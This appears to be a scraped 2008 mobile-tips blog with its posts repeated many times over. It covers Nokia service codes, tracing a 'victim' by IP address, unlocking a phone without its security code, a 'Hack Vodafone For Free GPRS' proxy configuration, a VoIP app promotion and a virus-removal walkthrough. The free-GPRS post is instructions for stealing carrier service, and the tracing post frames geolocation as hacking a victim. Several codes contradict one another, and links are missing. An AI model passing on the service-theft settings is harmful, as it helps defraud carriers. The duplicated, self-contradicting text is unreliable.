(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number). ( Favourite )
(8) #pw+1234567890+ 1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(9) #pw+1234567890+ 2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(10) #pw+1234567890+ 3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(11) #pw+1234567890+ 4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(12) *#147# (vodafone) this lets you know who called you last.
(13) *#1471# Last call (Only vodofone).
(14) *#21# Allows you to check the number that "All Calls" are diverted to
(15) *#2640# Displays security code in use.
(16) *#30# Lets you see the private number.
(17) *#43# Allows you to check the "Call Waiting" status of your phone.
(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.
(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.
(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.
(21) *#67705646# Removes operator logo on 3310 & 3330.
(22) *#73# Reset phone timers and game scores.
(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature
(24) *#7760# Manufactures code.
(25) *#7780# Restore factory settings
26) *#8110# Software version for the nokia 8110.
(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair
(0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. (Favourite )
(28) *#94870345123456789 # Deactivate the PWM-Mem.
(29) **21*number# Turn on "All Calls" diverting to the phone number entered.
(30) **61*number# Turn on "No Reply" diverting to the phone number entered.
(31) **67*number# Turn on "On Busy" diverting to the phone number entered.
(32) 12345 This is the default security code.
Press and hold # Lets you switch between lines
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+ 1
Network lock status #pw+1234567890+ 2
Provider lock status: #pw+1234567890+ 3
SimCard lock status: #pw+1234567890+ 4
NOKIA 6110/6120/6130/ 6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
NOKIA 3110
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
NOKIA 3330
*#06# This will show your warranty details *#92702689#
*3370# Basically increases the quality of calling sound, but decreases battery length.
#3370# Deactivates the above
*#0000# Shows your software version
*#746025625# This shows if your phone will allow sim clock stoppage
*4370# Half Rate Codec activation. It will automatically restart
#4370# Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings To do this simply use this code
*#7780# Manufacturer Info Date of Manufacturing *#3283#
(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( Favourite )
(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.
5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line :
Compression Type. ( Favourite )
(6) *#9999# Phones software version if *#0000# does not work.
(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number). ( Favourite )
(8) #pw+1234567890+ 1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(9) #pw+1234567890+ 2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(10) #pw+1234567890+ 3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(11) #pw+1234567890+ 4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(12) *#147# (vodafone) this lets you know who called you last.
(13) *#1471# Last call (Only vodofone).
(14) *#21# Allows you to check the number that "All Calls" are diverted to
(15) *#2640# Displays security code in use.
(16) *#30# Lets you see the private number.
(17) *#43# Allows you to check the "Call Waiting" status of your phone.
(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.
(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.
(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.
(21) *#67705646# Removes operator logo on 3310 & 3330.
(22) *#73# Reset phone timers and game scores.
(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature
(24) *#7760# Manufactures code.
(25) *#7780# Restore factory settings
26) *#8110# Software version for the nokia 8110.
(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair
(0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. (Favourite )
(28) *#94870345123456789 # Deactivate the PWM-Mem.
(29) **21*number# Turn on "All Calls" diverting to the phone number entered.
(30) **61*number# Turn on "No Reply" diverting to the phone number entered.
(31) **67*number# Turn on "On Busy" diverting to the phone number entered.
(32) 12345 This is the default security code.
Press and hold # Lets you switch between lines
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+ 1
Network lock status #pw+1234567890+ 2
Provider lock status: #pw+1234567890+ 3
SimCard lock status: #pw+1234567890+ 4
NOKIA 6110/6120/6130/ 6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
NOKIA 3110
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
NOKIA 3330
*#06# This will show your warranty details *#92702689#
*3370# Basically increases the quality of calling sound, but decreases battery length.
#3370# Deactivates the above
*#0000# Shows your software version
*#746025625# This shows if your phone will allow sim clock stoppage
*4370# Half Rate Codec activation. It will automatically restart
#4370# Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings To do this simply use this code
*#7780# Manufacturer Info Date of Manufacturing *#3283#
Trace A PC Through Its IP Address
In this post i will tell you have to get someone’s Country and even his City even if you know only the ip address of that person.
Actually tracing is done by using Geo Ip tools and it is a type of hacking.
First of all go
Then in the textarea insert the ip address of the victim who’s country and city you want to find.
Then click on lookup ip addressed button.
And it will give you all the information
Actually tracing is done by using Geo Ip tools and it is a type of hacking.
First of all go
Then in the textarea insert the ip address of the victim who’s country and city you want to find.
Then click on lookup ip addressed button.
And it will give you all the information
Trace A PC Through Its IP Address
In this post i will tell you have to get someone’s Country and even his City even if you know only the ip address of that person.
Actually tracing is done by using Geo Ip tools and it is a type of hacking.
First of all go
Then in the textarea insert the ip address of the victim who’s country and city you want to find.
Then click on lookup ip addressed button.
And it will give you all the information
Actually tracing is done by using Geo Ip tools and it is a type of hacking.
First of all go
Then in the textarea insert the ip address of the victim who’s country and city you want to find.
Then click on lookup ip addressed button.
And it will give you all the information
Unlock Your Phone's Security Code
Have you ever encountered the situation when you may want to just lock your phone or you may want to format your phone ? if yes then this post is for you.
NOTE: The default security code for all Nokia handsets is 12345.
So today i am going to post the way through which you can unlock your Nokia phone
There are three ways through which you can unlock your nokia phone without knowing the security code.
Method 1. Try the default security code i.e 12345 for all nokia phones.
Method 2. Download the java software from here and install it on nokia java based symbian phone.
Method 3. You can also unlock your nokia phone directly over internet by “Enter your phone IMEI number” by typing the code in the brackets (*#06#) from this website .
So these are all the ways you can use to unlock all nokia symbian based phone.
If you like pls comment….
Links will open in a new tab.
NOTE: The default security code for all Nokia handsets is 12345.
So today i am going to post the way through which you can unlock your Nokia phone
There are three ways through which you can unlock your nokia phone without knowing the security code.
Method 1. Try the default security code i.e 12345 for all nokia phones.
Method 2. Download the java software from here and install it on nokia java based symbian phone.
Method 3. You can also unlock your nokia phone directly over internet by “Enter your phone IMEI number” by typing the code in the brackets (*#06#) from this website .
So these are all the ways you can use to unlock all nokia symbian based phone.
If you like pls comment….
Links will open in a new tab.
Unlock Your Phone's Security Code
Have you ever encountered the situation when you may want to just lock your phone or you may want to format your phone ? if yes then this post is for you.
NOTE: The default security code for all Nokia handsets is 12345.
So today i am going to post the way through which you can unlock your Nokia phone
There are three ways through which you can unlock your nokia phone without knowing the security code.
Method 1. Try the default security code i.e 12345 for all nokia phones.
Method 2. Download the java software from here and install it on nokia java based symbian phone.
Method 3. You can also unlock your nokia phone directly over internet by “Enter your phone IMEI number” by typing the code in the brackets (*#06#) from this website .
So these are all the ways you can use to unlock all nokia symbian based phone.
If you like pls comment….
Links will open in a new tab.
NOTE: The default security code for all Nokia handsets is 12345.
So today i am going to post the way through which you can unlock your Nokia phone
There are three ways through which you can unlock your nokia phone without knowing the security code.
Method 1. Try the default security code i.e 12345 for all nokia phones.
Method 2. Download the java software from here and install it on nokia java based symbian phone.
Method 3. You can also unlock your nokia phone directly over internet by “Enter your phone IMEI number” by typing the code in the brackets (*#06#) from this website .
So these are all the ways you can use to unlock all nokia symbian based phone.
If you like pls comment….
Links will open in a new tab.
Hack Vodadone For Free GPRS
I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone.
N here I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.
Followng are the Settings you require to configure on your Mobile:
Account Name: Vodafone_gprs
User Name: (no need)
Pass: (no need)
Access Point Settings:
Proxy: Enabled
Proxy Address:
Proxy Port: 9401
Data Bearer: Packet Data
Bearer Settings:
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)
*IF that happen this settings is not working then change the proxy port number to:-
Proxy Port: 9401
N here I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.
Followng are the Settings you require to configure on your Mobile:
Account Name: Vodafone_gprs
User Name: (no need)
Pass: (no need)
Access Point Settings:
Proxy: Enabled
Proxy Address:
Proxy Port: 9401
Data Bearer: Packet Data
Bearer Settings:
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)
*IF that happen this settings is not working then change the proxy port number to:-
Proxy Port: 9401
Hack Vodadone For Free GPRS
I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone.
N here I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.
Followng are the Settings you require to configure on your Mobile:
Account Name: Vodafone_gprs
User Name: (no need)
Pass: (no need)
Access Point Settings:
Proxy: Enabled
Proxy Address:
Proxy Port: 9401
Data Bearer: Packet Data
Bearer Settings:
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)
*IF that happen this settings is not working then change the proxy port number to:-
Proxy Port: 9401
N here I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.
Followng are the Settings you require to configure on your Mobile:
Account Name: Vodafone_gprs
User Name: (no need)
Pass: (no need)
Access Point Settings:
Proxy: Enabled
Proxy Address:
Proxy Port: 9401
Data Bearer: Packet Data
Bearer Settings:
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)
*IF that happen this settings is not working then change the proxy port number to:-
Proxy Port: 9401
How To View High Quality Videos In You Tube
In Youtube almost all the videos are displayed with low quality, I will tell you how to get their high quality video’s
Just enter “&fmt=18″ (without quotes, obviously) in the end of any video
For eg:-
Just enter “&fmt=18″ (without quotes, obviously) in the end of any video
For eg:-
How To View High Quality Videos In You Tube
In Youtube almost all the videos are displayed with low quality, I will tell you how to get their high quality video’s
Just enter “&fmt=18″ (without quotes, obviously) in the end of any video
For eg:-
Just enter “&fmt=18″ (without quotes, obviously) in the end of any video
For eg:-
Saturday, November 8, 2008
Special Mobile Secret Codes
To know the IMEI (International Mobile Equipment Identity) No.: *#06#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
Special Mobile Secret Codes
To know the IMEI (International Mobile Equipment Identity) No.: *#06#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
Call To Any Mobile Device With Tallkonaut
Talkonaut is a mobile application with which you can call for free to any mobile device anywhere. Even if the calls are not free, it provides the cheapest alternative to make international calls or infact any call. Talkonaut provides support to voip over gprs, 3G so that only the data transfer charge is the only cost you have to bear which is certainly very cheap than the expensive talk time minutes. When using Talkonaut you can chat all of your friends using different clients like Jabber, Google Talk, ICQ, MSN, AIM and Yahoo.

Features of Talkonaut are:
1. With Talkonaut you can make free calls to your friends using Google Talk, MSN/Live Messenger, Yahoo Messenger, SIP and other Talkonaut buddies.
2. Talkonaut provides integrated support to all the other networks like Google Talk, MSN/Live Messenger, Yahoo Messenger and you can receive and send messages to all your friends belonging to different networks.
3. Talkonaut also has some built in smileys which you can use while chatting with your friends.
4. Talkonaut can also reduce the bandwidth usage upto 15 times by its zlib compression technology which can certainly save good amount of money if you don’t have flat rate package.
5. Talkonaut also has support for file transfer.
6. With Talkonaut you can also initiate your own private chat session with your friends so that no one else can disturb you while you are in a conference.
7. The interface is also very simple and very well carved. Its multitab menu provides quick access to different categories.
8. Talkonaut shows the status message of your friends and you can also set your status message so that others can know what you are doing right now.
Features of Talkonaut are:
1. With Talkonaut you can make free calls to your friends using Google Talk, MSN/Live Messenger, Yahoo Messenger, SIP and other Talkonaut buddies.
2. Talkonaut provides integrated support to all the other networks like Google Talk, MSN/Live Messenger, Yahoo Messenger and you can receive and send messages to all your friends belonging to different networks.
3. Talkonaut also has some built in smileys which you can use while chatting with your friends.
4. Talkonaut can also reduce the bandwidth usage upto 15 times by its zlib compression technology which can certainly save good amount of money if you don’t have flat rate package.
5. Talkonaut also has support for file transfer.
6. With Talkonaut you can also initiate your own private chat session with your friends so that no one else can disturb you while you are in a conference.
7. The interface is also very simple and very well carved. Its multitab menu provides quick access to different categories.
8. Talkonaut shows the status message of your friends and you can also set your status message so that others can know what you are doing right now.
Call To Any Mobile Device With Tallkonaut
Talkonaut is a mobile application with which you can call for free to any mobile device anywhere. Even if the calls are not free, it provides the cheapest alternative to make international calls or infact any call. Talkonaut provides support to voip over gprs, 3G so that only the data transfer charge is the only cost you have to bear which is certainly very cheap than the expensive talk time minutes. When using Talkonaut you can chat all of your friends using different clients like Jabber, Google Talk, ICQ, MSN, AIM and Yahoo.

Features of Talkonaut are:
1. With Talkonaut you can make free calls to your friends using Google Talk, MSN/Live Messenger, Yahoo Messenger, SIP and other Talkonaut buddies.
2. Talkonaut provides integrated support to all the other networks like Google Talk, MSN/Live Messenger, Yahoo Messenger and you can receive and send messages to all your friends belonging to different networks.
3. Talkonaut also has some built in smileys which you can use while chatting with your friends.
4. Talkonaut can also reduce the bandwidth usage upto 15 times by its zlib compression technology which can certainly save good amount of money if you don’t have flat rate package.
5. Talkonaut also has support for file transfer.
6. With Talkonaut you can also initiate your own private chat session with your friends so that no one else can disturb you while you are in a conference.
7. The interface is also very simple and very well carved. Its multitab menu provides quick access to different categories.
8. Talkonaut shows the status message of your friends and you can also set your status message so that others can know what you are doing right now.
Features of Talkonaut are:
1. With Talkonaut you can make free calls to your friends using Google Talk, MSN/Live Messenger, Yahoo Messenger, SIP and other Talkonaut buddies.
2. Talkonaut provides integrated support to all the other networks like Google Talk, MSN/Live Messenger, Yahoo Messenger and you can receive and send messages to all your friends belonging to different networks.
3. Talkonaut also has some built in smileys which you can use while chatting with your friends.
4. Talkonaut can also reduce the bandwidth usage upto 15 times by its zlib compression technology which can certainly save good amount of money if you don’t have flat rate package.
5. Talkonaut also has support for file transfer.
6. With Talkonaut you can also initiate your own private chat session with your friends so that no one else can disturb you while you are in a conference.
7. The interface is also very simple and very well carved. Its multitab menu provides quick access to different categories.
8. Talkonaut shows the status message of your friends and you can also set your status message so that others can know what you are doing right now.
Thursday, November 6, 2008
Funny USt Scandal Virus Removal
Tthis virus may put yourself in state of embarrassment when it sends some senseless message to your friends in your yahoo messenger buddies.
It creates following files:
* Killer.exe in c:\windows\
* lsass.exe in c:\documents and settings\all users\start menu\programs\startup
* xmss.exe in the root drive of all partitions and also in c:\windows
* autorun.inf in all the partitions.
* the main file Funny UST Scandal.avi.exe in all the partitions and
* Funny UST Scandal.exe in c:\Windows.
Not only this, it also creates the following entries:
HKLM\Software\Microsoft\WindowNT\CurrentVersion\Winlogon\shell HKCU\Software\Microsoft\windows\Currentversion\Run\Runonce
You will find all these or some of these files if your system is infected by this virus.
Method 1: Remove the virus automatically by UST Virus removal Tool.
Download It Here
Method 2: Manual removal procedure.
1. Firstly you need to end process running by the virus, for this download process explorer.
killer.exe ,b.lsass.exe ,c.smss.exe
Note: close all those processes that have the same icon of Funny UST Scandal.avi.exe
2. Open Start >> Run and type “cmd” (without quotes) and press enter.
3. Above command will open up command prompt, type “cd\” (without quotes)
4. Type “attrib -h -s smss.exe” (without quotes)
5. Type “attrib -h -s autorun.inf” (without quotes)
6. Repeat step 4 and 5 for all the drives through command prompt (on the root folder)
7. Now open all your drives one by one by typing C: ,D: and so on in the address bar at the top, delete smss.exe,autorun.inf,Funny UST Scandal.avi.exe
8. Open command prompt again by following step 2.
9. Type “cd c:\windows” (without quotes)
10. Type “attrib -h -s smss.exe” (without quotes)and press enter. Type “delete smss.exe” and press enter also type “delete lsass.exe” and press enter.
11. Now Open Start >> Run and type regedit and press enter.
12. Locate these paths one by one in the registry.
* HKLM\Software\Microsoft\WindowNT\CurrentVersion\Winlogon\shell
* HKCU\Software\Microsoft\windows\Currentversion\Run\Runonce
At these paths, locate the keys which have values as (killer.exe) and (c:\windows\smss.exe). Delete these registry keys.
We hope you will be able to remove the virus by at least one of the method specified above, if not please let us know through comments.
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